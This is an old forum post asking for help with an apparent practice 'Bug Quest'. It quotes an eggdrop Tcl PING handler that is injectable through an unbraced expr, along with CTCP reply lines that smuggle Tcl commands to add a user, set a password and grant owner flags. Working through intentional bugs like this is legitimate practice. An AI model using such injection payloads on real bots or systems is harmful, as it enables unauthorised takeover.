i have a question about an exploit Bug Quest that i have to do:
I got this message:
Code: Select all
bind ctcr - PING ctcr:pingreply
proc ctcr:pingreply {nick uhost hand dest key arg} {
set dur [expr [unixtime] - $arg]
putserv "NOTICE $nick :Your ping reply took $dur seconds"}
by exploiting an intentional bug in the bot.
Any effort to let the bot crash, die or act erroneously is forbidden.
I have tried the following commands in the channel, but just by the first one i got a message back.
/ctcpreply THEBOT PING [adduser TraXX *!TraXX@*]
/ctcpreply THEBOT PING [setuser TraXX HOSTS TraXX!TraXX@*.net]
/ctcpreply THEBOT PING [setuser TraXX PASS blabla]
/ctcpreply THEBOT PING [chattr TraXX +mn]
/dcc chat THEBOT
What i have done wrong?
The First Anwswer i get from the bot is when i have typed in the first CTCPREPLY Line 1 above.
I got this:
··· notice (u): -THEBOT- Your ping reply took 1021302734 seconds
By the other last 4 lines nohting happens.
What i must do?
How i can get me regged on the bot with +n and make a dcc chat?
Please help me, it is important!
THANKX IN ADVANCE!!!
<font size=-1>[ This Message was edited by: TraXX on 2002-05-13 12:58 ]</font>